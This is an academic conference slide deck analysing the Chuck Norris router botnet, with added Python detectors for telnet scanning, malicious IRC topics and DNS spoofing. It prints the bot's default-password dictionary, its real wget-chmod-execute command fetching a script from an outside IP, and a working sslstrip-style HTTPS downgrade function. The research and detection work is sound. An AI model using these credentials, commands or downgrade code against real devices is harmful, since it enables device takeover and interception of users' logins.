SLIDE 1 / 22

Embedded Malware – An Analysis of the Chuck Norris Botnet

P. Čeleda, R. Krejčí, J. Vykopal, M. Drašar
{celeda|vykopal|drasar}@ics.muni.cz, radek.krejci@mail.muni.cz

The sixth European Conference on Computer Network Defense – EC2ND, 28-29 October 2010, Berlin, Germany

SLIDE 2 / 22

Part I – Botnet Discovery

P. Čeleda et al., Embedded Malware – An Analysis of the Chuck Norris Botnet, 2 / 22

SLIDE 3 / 22

Motivation – What is happening in our network?

[Figure: the Internet connected to several LANs through a firewall with AV protection.]

But what is happening here?

SLIDE 4 / 22

(In)visible Embedded Malware

Client-side anti-* protection is used and well known. What could happen if the network infrastructure itself is attacked?

[Figure: a Chuck Norris botnet attack aimed at the infrastructure between the LANs and the Internet.]


SLIDE 5 / 22

Network Security Monitoring at Masaryk University

[Figure: the monitoring pipeline]
  1. NetFlow data generation – FlowMon probes.
  2. NetFlow data collection – NetFlow v5/v9 export to a NetFlow collector.
  3. NetFlow data analyses – SPAM detection, worm/virus detection, intrusion detection.
  4. Incident reporting – http to a WWW server, mail to a mailbox, syslog to a syslog server.

SLIDE 6 / 22

Botnet Discovery

Worldwide TELNET scan attempts, mostly coming from ADSL connections.

SLIDE 7 / 22

Part II – Chuck Norris Botnet

SLIDE 8 / 22

Chuck Norris Botnet in a Nutshell

  • Linux malware – IRC bots with central C&C servers.
  • Attacks poorly-configured Linux MIPSEL devices.
  • Vulnerable devices – ADSL modems and routers.
  • Uses a TELNET brute-force attack as infection vector.
  • Users are not aware of the malicious activities.
  • No anti-malware solution exists to detect it.

Discovered at Masaryk University on 2 December 2009. The malware got the Chuck Norris moniker from a comment in its source code: "[R]anger Killato : in nome di Chuck Norris !" (Italian: "in the name of Chuck Norris!").


SLIDE 9 / 22

Monitoring of the Botnet

Botnet infiltration was used from 12/2009 to 02/2010.

[Figure: an ASUS WL-500gP router, deliberately exposed as an agent-provocateur, is connected through its WAN port behind a TAP; CSIRT-MU records the traffic with FlowMon and tcpdump while the bot talks to the IRC server, the other bots and the bot herder ("bad guy").]


SLIDE 10 / 22

Botnet Searching for Vulnerable Devices

[Figure: the infected device works from a list of C class networks to scan (217.236., 88.253., ..., 201.1., 200.121., ..., 85.174., 222.215., ..., 58.6., 220.240., ..., 203.223., ...), runs pnscan against port 23 and produces a list of possible victims.]

Table 1: Example of botnet propagation targets.

  IP Range          Owner
  217.236.0.0/16    Deutsche Telekom
  88.253.0.0/16     TurkTelekom
  87.22.0.0/16      Telecom Italia
  220.240.0.0/16    Comindico Australia
  85.174.0.0/16     Volgograd Electro Svyaz
  222.215.0.0/16    China Telecom
  201.1.0.0/16      Telecomunicacoes de Sao Paulo
  200.121.0.0/16    Telefonica del Peru


SLIDE 11 / 22

Infection of a Vulnerable Device

[Figure: the infected device runs a TELNET service dictionary attack against the victim; once logged in, the victim downloads the current bot version from a web server.]

Table 2: Passwords used for a dictionary attack.

  User    Password
  root    admin, Admin, password, root, 1234, private, XA1bac0MX, adsl1234, %%fuckinside%%, dreambox, blank password
  admin   admin, password, blank password
  1234    1234
  Admin   (password not recovered)
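The two behaviours on the scanning and infection slides above leave distinct traces in flow data: pnscan produces one SYN per probed host towards tcp/23 from a single source, and a dictionary attack produces a burst of short, completed tcp/23 sessions between one source and one device. As an added example (not the authors' FlowMon/NetFlow tooling), the following Python script flags both in nfdump-style CSV records. The sample records, addresses, field layout and thresholds are constructed for illustration.

```python
"""Flag telnet scanning and telnet dictionary attacks in NetFlow-style records.

Added example. The record layout imitates nfdump CSV output (ts,sa,da,sp,dp,pr,flg,ipkt,ibyt)
and all thresholds and addresses are illustrative assumptions, not values from the paper.
"""
import csv
from collections import defaultdict
from io import StringIO

SCAN_MIN_TARGETS = 50    # distinct hosts probed on tcp/23 with SYN-only flows (pnscan behaviour)
BRUTE_MIN_SESSIONS = 8   # short completed tcp/23 sessions from one source to one device
BRUTE_MAX_PACKETS = 20   # a rejected login attempt is only a handful of packets


def build_sample_flows():
    """Constructed sample data, not a real capture: a pnscan-style scanner, a dictionary
    attacker (12 rejected logins, then one long session), one legitimate admin session and
    some unrelated web traffic. All addresses are placeholders."""
    rows = ["ts,sa,da,sp,dp,pr,flg,ipkt,ibyt"]
    for i in range(1, 121):  # 200.121.7.33 sends one SYN to each of 120 hosts in 147.251.1.0/24
        rows.append(f"2009-12-02 10:00:{i % 60:02d},200.121.7.33,147.251.1.{i},40{i:03d},23,TCP,....S.,1,48")
    for i in range(12):      # 88.253.4.9 hammers one device with short sessions
        rows.append(f"2009-12-02 10:05:{i:02d},88.253.4.9,147.251.2.77,5{i:04d},23,TCP,.AP.SF,9,412")
    rows.append("2009-12-02 10:06:00,88.253.4.9,147.251.2.77,50099,23,TCP,.AP.SF,220,18930")
    rows.append("2009-12-02 10:10:00,147.251.9.5,147.251.2.77,51000,23,TCP,.AP.SF,340,27400")
    rows.append("2009-12-02 10:11:00,147.251.9.5,147.251.3.20,51001,80,TCP,.AP.SF,30,12000")
    return "\n".join(rows) + "\n"


def parse_flows(csv_text):
    """Parse nfdump-style CSV into dicts; numeric fields are converted, the rest stay strings."""
    flows = []
    for row in csv.DictReader(StringIO(csv_text)):
        for key in ("dp", "ipkt", "ibyt"):
            row[key] = int(row[key])
        flows.append(row)
    return flows


def is_syn_only(flags):
    """nfdump renders TCP flags as a six-character UAPRSF field, so '....S.' is a bare SYN."""
    return flags.strip() == "....S."


def detect_telnet_scanners(flows):
    """Horizontal scan: one source sends SYN-only probes to many distinct hosts on tcp/23.
    Returns {source: number of distinct targets} for sources above the threshold."""
    targets = defaultdict(set)
    for f in flows:
        if f["pr"] == "TCP" and f["dp"] == 23 and is_syn_only(f["flg"]):
            targets[f["sa"]].add(f["da"])
    return {src: len(dsts) for src, dsts in targets.items() if len(dsts) >= SCAN_MIN_TARGETS}


def detect_telnet_bruteforce(flows):
    """Dictionary attack: many short, completed tcp/23 sessions between one source and one
    device. Returns {(source, device): session count} for pairs above the threshold."""
    sessions = defaultdict(int)
    for f in flows:
        if (f["pr"] == "TCP" and f["dp"] == 23 and "A" in f["flg"]
                and f["ipkt"] <= BRUTE_MAX_PACKETS):
            sessions[(f["sa"], f["da"])] += 1
    return {pair: n for pair, n in sessions.items() if n >= BRUTE_MIN_SESSIONS}


if __name__ == "__main__":
    flows = parse_flows(build_sample_flows())
    print("scanners:", detect_telnet_scanners(flows))
    print("brute force:", detect_telnet_bruteforce(flows))
```

The scanner check keys on SYN-only flows because a pnscan probe to a closed or filtered host never completes a handshake; the brute-force check deliberately ignores the long final session, which is what a successful login followed by the bot download looks like, and would be the next thing to look for once a pair is flagged.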


SLIDE 12 / 22

Bot Initialization and Further Propagation

[Figure: the bot on the infected device denies remote access to the device (ports 22-80), then connects to the C&C (IRC) server.]
  1. join ##soldiers##
  2. Topic: !* init-cmd (get scan-tools)

Initial Command (IRC Topic):

:!* sh wget http://87.98.163.86/pwn/scan.sh;chmod u+x scan.sh;./scan.sh
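The bot's control channel is the IRC topic: whatever the herder sets as the topic of ##soldiers## is executed by every bot that joins. As an added example (not the authors' tooling), the following Python script parses raw server-to-client IRC lines, as one would pull them out of the tcpdump capture on the TAP, and flags TOPIC commands and RPL_TOPIC (332) replies that carry a download-and-execute chain. The sample lines, server and nick names are constructed; only the topic text comes from the slide.

```python
"""Spot IRC channel topics that carry a download-and-execute command.

Added example, not the authors' tooling. Input is a list of raw server-to-client IRC lines;
the sample capture, server and nick names are constructed, only the topic text is from
the slide above.
"""
import re
from dataclasses import dataclass

# RFC 1459 line: [":" prefix SPACE] command [params] [" :" trailing]
IRC_LINE = re.compile(
    r"^(?::(?P<prefix>\S+) )?(?P<cmd>\S+)(?P<params>(?: [^:\s]\S*)*)(?: :(?P<trailing>.*))?$")
# The bots executed the topic when it began with "!* sh"; the second pattern is the generic
# fetch-chmod-run chain, so a topic with a different bot prefix still matches.
BOT_CMD_PREFIX = re.compile(r"^!\S*\s+sh\b")
DOWNLOAD_AND_RUN = re.compile(r"\b(?:wget|curl|tftp)\b[^;]*;\s*chmod\s+[ugoa+x0-9]+\s+\S+;\s*\./\S+")
URL = re.compile(r"https?://[^\s;\"']+")


@dataclass
class Finding:
    channel: str
    topic: str
    urls: list
    reason: str


def parse_irc_line(line):
    """Return (prefix, COMMAND, [params], trailing) or None for an unparsable line."""
    m = IRC_LINE.match(line.rstrip("\r\n"))
    if not m:
        return None
    return m.group("prefix"), m.group("cmd").upper(), m.group("params").split(), m.group("trailing")


def extract_topics(lines):
    """Yield (channel, topic) from TOPIC commands and RPL_TOPIC (332) replies."""
    for line in lines:
        parsed = parse_irc_line(line)
        if parsed is None:
            continue
        _prefix, cmd, params, trailing = parsed
        if trailing is None:
            continue
        if cmd == "TOPIC" and len(params) >= 1:       # :nick!user@host TOPIC #chan :text
            yield params[0], trailing
        elif cmd == "332" and len(params) >= 2:       # :server 332 me #chan :text
            yield params[1], trailing


def classify_topic(channel, topic):
    """Return a Finding when the topic looks like a bot command, else None."""
    urls = URL.findall(topic)
    if BOT_CMD_PREFIX.search(topic) and DOWNLOAD_AND_RUN.search(topic):
        return Finding(channel, topic, urls, "bot command prefix followed by download-and-execute chain")
    if DOWNLOAD_AND_RUN.search(topic):
        return Finding(channel, topic, urls, "download-and-execute chain in channel topic")
    return None


def scan_irc_capture(lines):
    """Run the topic check over a whole capture; returns the findings in capture order."""
    findings = []
    for channel, topic in extract_topics(lines):
        finding = classify_topic(channel, topic)
        if finding is not None:
            findings.append(finding)
    return findings


# Constructed capture excerpt: a bot joining ##soldiers## and receiving the topic from the
# slide, plus benign traffic in another channel. Server and nick names are made up.
SAMPLE_CAPTURE = [
    ":irc.example.test 001 mipsel-bot :Welcome to the Internet Relay Network mipsel-bot",
    ":mipsel-bot!bot@10.0.0.2 JOIN :##soldiers##",
    ":irc.example.test 332 mipsel-bot ##soldiers## :!* sh wget http://87.98.163.86/pwn/scan.sh;chmod u+x scan.sh;./scan.sh",
    ":irc.example.test 333 mipsel-bot ##soldiers## herder 1259743200",
    ":herder!h@10.0.0.9 TOPIC ##soldiers## :!* sh wget http://87.98.163.86/pwn/scan.sh;chmod u+x scan.sh;./scan.sh",
    ":alice!a@10.0.0.5 TOPIC #linux :Kernel 2.6.32 is out, changelog at http://kernel.org/",
    "PING :irc.example.test",
]

if __name__ == "__main__":
    for f in scan_irc_capture(SAMPLE_CAPTURE):
        print(f"{f.channel}: {f.reason} -> {f.urls}")
```

The URLs pulled from a flagged topic are the distribution servers worth blocking and watching; on the slide that is the host serving scan.sh.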

SLIDE 13 / 22

Botnet Activities – I

Botnet Threats
  • Denial-of-Service attacks – DoS, DDoS.
  • DNS spoofing attack.
  • Infected device reconfiguration.

Consequences for Users
  • The link was saturated with malicious traffic.
  • Economic losses and criminal sanctions against unaware users.


SLIDE 14 / 22

Botnet Activities – II

DNS Spoofing Attack
  • Web page redirect: www.facebook.com, www.google.com.
  • Malicious code execution.

[Figure: the victim sits behind the infected router, whose DNS settings point at OpenDNS.com and at the botnet C&C centre (primary and secondary DNS server). Queries for www.facebook.com and www.linux.org are shown: www.linux.org resolves normally, while the targeted names are redirected.]
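The DNS spoofing attack above works because the infected router decides which resolver the victim uses. As an added example (not the authors' code), the following Python script parses raw DNS responses with the standard library and flags names whose A records from the router-supplied resolver include an address the reference resolver never returned. The responses are constructed in the script, with RFC 5737 documentation addresses standing in for the real ones; in practice the two sets of responses would be obtained by querying the router's resolver address and a known-good server.

```python
"""Compare A records from the router-supplied resolver with a reference resolver.

Added example, not the authors' code. Builds and parses DNS messages with the standard
library only; the responses below are constructed, with RFC 5737 documentation addresses
standing in for real ones.
"""
import struct


def encode_name(name):
    """Encode 'www.facebook.com' as DNS labels terminated by a zero byte."""
    labels = name.strip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode() for l in labels) + b"\x00"


def build_a_response(txn_id, name, ips, ttl=300):
    """Minimal DNS response with one A record per IP (used here only to construct sample data)."""
    header = struct.pack("!HHHHHH", txn_id, 0x8180, 1, len(ips), 0, 0)  # QR, RD, RA set; NOERROR
    question = encode_name(name) + struct.pack("!HH", 1, 1)              # QTYPE=A, QCLASS=IN
    answers = b""
    for ip in ips:
        rdata = bytes(int(octet) for octet in ip.split("."))
        # owner name is a compression pointer (0xC00C) back to the question name at offset 12
        answers += b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, ttl, len(rdata)) + rdata
    return header + question + answers


def read_name(msg, off):
    """Decode a possibly compressed name starting at off; return (name, offset after the field)."""
    labels, end, jumped = [], None, False
    while True:
        length = msg[off]
        if length & 0xC0 == 0xC0:                      # two-byte pointer to an earlier name
            if not jumped:
                end = off + 2
            off = struct.unpack("!H", msg[off:off + 2])[0] & 0x3FFF
            jumped = True
            continue
        if length == 0:
            if not jumped:
                end = off + 1
            break
        labels.append(msg[off + 1:off + 1 + length].decode())
        off += 1 + length
    return ".".join(labels), end


def parse_a_records(msg):
    """Return (question name, [A-record IPs]) from a response; non-A answers are skipped."""
    _txn, _flags, _qd, ancount, _ns, _ar = struct.unpack("!HHHHHH", msg[:12])
    qname, off = read_name(msg, 12)
    off += 4                                            # QTYPE + QCLASS
    ips = []
    for _ in range(ancount):
        _owner, off = read_name(msg, off)
        rtype, rclass, _ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        if rtype == 1 and rclass == 1 and rdlen == 4:
            ips.append(".".join(str(b) for b in msg[off:off + 4]))
        off += rdlen
    return qname, ips


def compare_resolvers(router_responses, reference_responses):
    """Names whose router-supplied A records include an address the reference never returned."""
    findings = {}
    for name, router_msg in router_responses.items():
        qname, router_ips = parse_a_records(router_msg)
        _, reference_ips = parse_a_records(reference_responses[name])
        unexpected = sorted(set(router_ips) - set(reference_ips))
        if unexpected:
            findings[qname] = unexpected
    return findings


# Constructed responses. The router-supplied resolver points the two targeted names at one
# host (198.51.100.66) and leaves www.linux.org alone, matching the figure above.
REFERENCE = {
    "www.facebook.com": build_a_response(0x1001, "www.facebook.com", ["192.0.2.10", "192.0.2.11"]),
    "www.google.com": build_a_response(0x1002, "www.google.com", ["192.0.2.20"]),
    "www.linux.org": build_a_response(0x1003, "www.linux.org", ["192.0.2.30"]),
}
ROUTER = {
    "www.facebook.com": build_a_response(0x2001, "www.facebook.com", ["198.51.100.66"]),
    "www.google.com": build_a_response(0x2002, "www.google.com", ["198.51.100.66"]),
    "www.linux.org": build_a_response(0x2003, "www.linux.org", ["192.0.2.30"]),
}

if __name__ == "__main__":
    print(compare_resolvers(ROUTER, REFERENCE))
```

A difference is a lead rather than proof: large sites answer from many addresses, so query the reference several times and compare against the union of its answers. The same address showing up for several unrelated names, as in the constructed data, is the pattern that points at a redirecting resolver.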


SLIDE 15 / 22

Botnet Size and Evaluation – I

Size estimation based on NetFlow data from Masaryk University: 33 000 unique attackers (infected devices) from 10/2009 to 02/2010.

Most Infected ISPs
  • Telefonica del Peru
  • Global Village Telecom (Brazil)
  • Turk Telecom
  • Pakistan Telecommunication Company
  • China Unicom Hebei Province Network

[Figure: Telnet scans against the Masaryk University network (left axis, up to 500 000) and unique attackers (right axis, up to 2 500), 1 October 2009 to 1 April 2010; marked events: botnet discovery 2.12.2009, botnet shutdown 23.2.2010.]

Unique attackers targeting the MU network
  Month      Min    Max    Avr    Mdn
  October            854    502    621
  November    41     628    241    136
  December    69    1321    366    325
  January      9    1467    312    137
  February   180    2004    670    560
  Total             2004    414    354

Botnet stopped activity on 23 February 2010.

SLIDE 16 / 22

Botnet Size and Evaluation – II

[Figure: unique attackers per source /8 network (A.0.0.0/8, vertical axis 0–250) over time, Oct 2009 – Feb 2010; unique-attacker scale 50–450.]

SLIDE 17 / 22

Part III – Beyond the Chuck Norris Botnet

SLIDE 18 / 22

Attacks on HTTPS using Chuck Norris Botnet – I

Features
  • Our extension to the Chuck Norris Botnet.
  • Based on the MITM (Man-In-The-Middle) attack presented by Moxie Marlinspike at Black Hat DC (02/2009).
  • The infected host operates as a transparent HTTP proxy.
  • We don't attack HTTPS directly (that would produce invalid certificates).

Vulnerable Systems
  • Any site providing an HTTP → HTTPS redirect.
  • Can't be detected on the web server side.
  • No invalid certificates on the client side.


SLIDE 19 / 22

Attacks on HTTPS using Chuck Norris Botnet – II

MITM attack using the sslstrip tool and an infected host (86.49.xxx.yyy) acting as the access point between the user and the web service (https://mail.google.com):

  1. user → infected host: GET HTTP mail.google.com
  2. infected host → web service: GET HTTP mail.google.com
  3. web service → infected host: HTTP 301 Moved Permanently, https://mail.google.com
  4. infected host → user: HTTP 301 Moved Permanently, http://mail.google.com (redirect rewritten to plain HTTP)
  5. user → infected host: GET HTTP mail.google.com
  6. infected host ↔ web service: SSL mail.google.com Client hello / SSL Server hello (the TLS session terminates at the proxy)
  7. infected host → user: HTTP 200 OK ... (content relayed to the user in cleartext)
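The rewriting step in the exchange above and the client-side check that defeats it, as an added example (constructed HTTP messages; not the authors' extension and not the sslstrip code itself). strip_https does what an sslstrip-style proxy does to the upstream reply: the 301 to https://mail.google.com becomes a 301 to http://mail.google.com, https:// links in the page body are downgraded, and any Strict-Transport-Security header is dropped. HstsStore and plan_request model a browser that honours HSTS (RFC 6797, published after this 2010 talk): once a policy has been learned over TLS, the browser upgrades http:// URLs before sending anything, so there is no plain request for the proxy to intercept.

```python
"""The sslstrip rewriting step from the exchange above, and the client-side HSTS check
that prevents it. Added example: constructed HTTP messages, not the authors' extension
and not the sslstrip code itself."""
import re


def parse_response(raw):
    """Split a raw HTTP/1.x response into (status line, {lowercased header: value}, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    status, *lines = head.split("\r\n")
    headers = {}
    for line in lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body


def serialize_response(status, headers, body):
    """Inverse of parse_response (header names come out lowercased, which HTTP permits)."""
    return status + "\r\n" + "".join(f"{k}: {v}\r\n" for k, v in headers.items()) + "\r\n" + body


def strip_https(raw_response):
    """What an sslstrip-style proxy does to the upstream reply before relaying it to the
    victim: turn an https:// redirect into an http:// one, downgrade https:// links in the
    body, and drop the header that would tell the browser to insist on TLS.
    Returns (rewritten response, list of URLs that were downgraded)."""
    status, headers, body = parse_response(raw_response)
    downgraded = []
    location = headers.get("location", "")
    if location.startswith("https://"):
        downgraded.append(location)
        headers["location"] = "http://" + location[len("https://"):]
    headers.pop("strict-transport-security", None)

    def downgrade(match):
        downgraded.append(match.group(0))
        return "http://" + match.group(1)

    body = re.sub(r"https://([^\s\"'<>]+)", downgrade, body)
    if "content-length" in headers:
        headers["content-length"] = str(len(body.encode()))
    return serialize_response(status, headers, body), downgraded


class HstsStore:
    """Simplified RFC 6797 policy store: host -> expiry timestamp."""

    def __init__(self):
        self.policies = {}

    def learn(self, host, headers, now, over_tls):
        """A Strict-Transport-Security header only counts when it arrived over TLS; on plain
        HTTP it could have been injected or removed by exactly this kind of proxy."""
        hsts = headers.get("strict-transport-security")
        if not over_tls or hsts is None:
            return
        match = re.search(r"max-age=(\d+)", hsts)
        if match:
            self.policies[host] = now + int(match.group(1))

    def must_use_https(self, host, now):
        return self.policies.get(host, 0) > now


def plan_request(url, store, now):
    """URL the client actually requests. An http:// URL to a host with a live HSTS policy is
    upgraded before any packet leaves, so the proxy never sees a request it could downgrade."""
    scheme, _, rest = url.partition("://")
    host = rest.split("/", 1)[0]
    if scheme == "http" and store.must_use_https(host, now):
        return "https://" + rest
    return url


# Constructed messages modelled on the slide's exchange.
UPSTREAM_REDIRECT = ("HTTP/1.1 301 Moved Permanently\r\nLocation: https://mail.google.com/\r\n"
                     "Strict-Transport-Security: max-age=31536000\r\nContent-Length: 0\r\n\r\n")
LOGIN_BODY = '<form action="https://mail.google.com/login"></form>'
UPSTREAM_LOGIN_PAGE = ("HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n"
                       f"Content-Length: {len(LOGIN_BODY)}\r\n\r\n{LOGIN_BODY}")

if __name__ == "__main__":
    relayed, changed = strip_https(UPSTREAM_REDIRECT)
    print(relayed.splitlines()[1], changed)              # Location is now http://
    store = HstsStore()
    store.learn("mail.google.com", {"strict-transport-security": "max-age=31536000"}, 1000, over_tls=True)
    print(plan_request("http://mail.google.com/", store, 1001))   # upgraded before sending
```

The store only accepts the header over TLS, and that is also the attack's remaining window: the very first visit to a site, before any policy has been learned, is still downgradable, which is the gap browser preload lists were introduced to close.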

SLIDE 20 / 22

Part IV – Conclusion

SLIDE 21 / 22

Conclusion

Botnet Timeline
  • Compilation timestamp in the pnscan tool – 4.7.2008.
  • First file uploaded to distribution servers – 19.5.2009.
  • Botnet discovery at Masaryk University – 2.12.2009.
  • Botnet shutdown (hibernation) – 23.2.2010.

Botnet Summary
  • There are no anti-* solutions for embedded/SoHo devices.
  • Based on known techniques and components from the Internet.
  • Users are not aware of the attack or the device infection.
  • No response and collaboration from infected networks.

SLIDE 22 / 22

Thank You For Your Attention!

Pavel Čeleda et al.
celeda@ics.muni.cz

Project CYBER
http://www.muni.cz/ics/cyber

This material is based upon work supported by the Czech Ministry of Defence under Contract No. OVMASUN200801.